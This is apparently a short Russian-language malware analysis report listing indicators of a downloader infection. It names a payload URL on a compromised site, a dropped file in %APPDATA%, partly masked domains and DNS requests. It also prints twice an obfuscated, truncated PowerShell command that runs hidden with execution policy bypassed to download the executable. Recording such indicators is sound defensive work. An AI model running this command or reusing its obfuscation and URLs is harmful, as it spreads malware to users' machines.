Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^ow^eRs^hEl^l.^ex^e ^-EX^Ec^U^t^IONPOLiCY ^by^PaSS -NopRofILe -^WINDoW^s^tY^l^e^ ^hIddEn^ ^(NeW-Ob^jecT syStE^M.NEt.weB^C^l^I^en^t).DOwNloAd^FILE(^'http://nexcontech.com/wp-cont...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /C "p^ow^eRs^hEl^l.^ex^e ^-EX^Ec^U^t^IONPOLiCY ^by^PaSS -NopRofILe -^WINDoW^s^tY^l^e^ ^hIddEn^ ^(NeW-Ob^jecT syStE^M.NEt.weB^C^l^I^en^t).DOwNloAd^FILE(^'http://nexcontech.com/wp-cont...' (со скрытым окном)